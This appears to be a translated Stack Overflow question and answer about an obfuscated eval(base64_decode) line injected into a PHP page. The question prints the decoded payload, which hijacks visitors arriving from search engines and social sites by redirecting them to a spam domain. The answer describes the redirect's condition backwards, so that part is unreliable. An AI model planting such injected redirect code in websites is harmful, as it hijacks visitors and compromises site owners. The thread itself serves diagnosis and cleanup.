eval(base64_decode hack

时间:2011-07-10 13:12:09

标签: php base64 eval

我正在使用的后端页面似乎注入了行 - eval(base64_decode(“CgplcnJvcl9yZXBvcnRpbmcoMCk7C ...”

并且base64字符串解码为

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
  $referer=$_SERVER['HTTP_REFERER'];

  if (stristr($referer,"aol.com")
    or stristr($referer,"yahoo")
    or stristr($referer,"google")
    or stristr($referer,"bing")
    or stristr($referer,"ask.com")
    or stristr($referer,"msn")
    or stristr($referer,"live")
    or stristr($referer,"facebook")
  ) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) {
        header("Location: http://lovemypants.co.cc/");
        exit();
    }
  }
}

很抱歉没有提出问题。在撰写这个问题的时候,我对编程和SO都是一个菜鸟,想知道这段代码的含义以及它的影响是什么。

1 个答案:

答案 0 :(得分:6)

如果您正在寻找风险分析,那么我可以告诉您,“黑客”只会将访问者重定向到lovemypants.co.cc,如果他们是实际访问,而不是从搜索引擎重定向。

删除黑客攻击,更改密码,设置公钥身份验证,让知道他们正在做什么的人保护您的服务器,并定期设置备份 ... 现在

(下次请实际上写一个问题。)